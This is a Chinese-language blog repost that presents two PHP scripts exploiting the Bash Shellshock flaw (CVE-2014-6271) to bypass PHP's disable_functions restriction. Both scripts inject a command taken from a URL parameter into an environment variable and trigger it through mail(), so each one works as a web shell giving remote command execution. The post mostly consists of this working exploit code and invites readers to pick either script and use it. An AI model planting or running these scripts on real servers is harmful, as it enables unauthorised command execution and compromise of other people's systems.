1. 云栖社区>
  2. PHP教程>
  3. 正文

PHP 5.x and GNU Bash

作者:用户 来源:互联网 时间:2017-12-01 17:15:22

phpgnubash

PHP 5.x and GNU Bash - 摘要: 本文讲的是PHP 5.x and GNU Bash, 之前ImageMagic漏洞火的时候,本站转发了一篇关于利用ImageMagic漏洞来绕过disable_function限制的文章,文章链接如下: 利用ImageMagick漏洞绕过disable_function 最近网上乱逛

之前ImageMagic漏洞火的时候,本站转发了一篇关于利用ImageMagic漏洞来绕过disable_function限制的文章,文章链接如下:

利用ImageMagick漏洞绕过disable_function

最近网上乱逛,在70sec发现这个脚本,国外大牛早就发出来了,只是我们没有使用,再转发给各位小伙伴们。

测试环境:php 5.3.2 bash 4.1.2 Centos 6

php.ini中存在如下设置:

disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source Bypass1脚本代码 <?php// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit// Date: 22/11/2014// Exploit Author: ssbostan// Vendor Homepage: http://www.gnu.org/software/bash/// Software Link: http://ftp.gnu.org/gnu/bash/// Version: <= 4.3// Tested on: Fedora 17, Ubuntu 8.04// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/echo "Disabled functions: ".ini_get('disable_functions')."/n";if(isset($_GET["cmd"]) && !empty($_GET["cmd"])){$file=tempnam("/tmp", "xpl");putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");mail("[email protected]", "", "", "", "-bv");echo '<pre>';echo file_get_contents($file);echo '</pre>';unlink($file);}?> Bypass2脚本代码 <?php# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)# Google Dork: none# Date: 10/31/2014# Exploit Author: Ryan King (Starfall)# Vendor Homepage: http://php.net# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror# Version: 5.* (tested on 5.6.2)# Tested on: Debian 7 and CentOS 5 and 6# CVE: CVE-2014-6271echo "Disabled functions: ".ini_get('disable_functions')."/n";function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); // In Safe Mode, the user may only alter environment variables whose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variables that // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, // PHP will let the user modify ANY environment variable! mail("[email protected]","","","","-bv"); // -bv so we don't actually send any mail } else return "Not vuln (not bash)"; $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln.";}echo '<pre>';echo shellshock($_REQUEST["cmd"]);echo '</pre>';?>

两个脚本功能一样的,写法稍有不同,大家可以任选其一使用,效果如图:

PHP 5.x and GNU Bash

以上是云栖社区小编为您精心准备的的内容,在云栖社区的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索php , gnu bash ,以便于您获取更多的相关知识。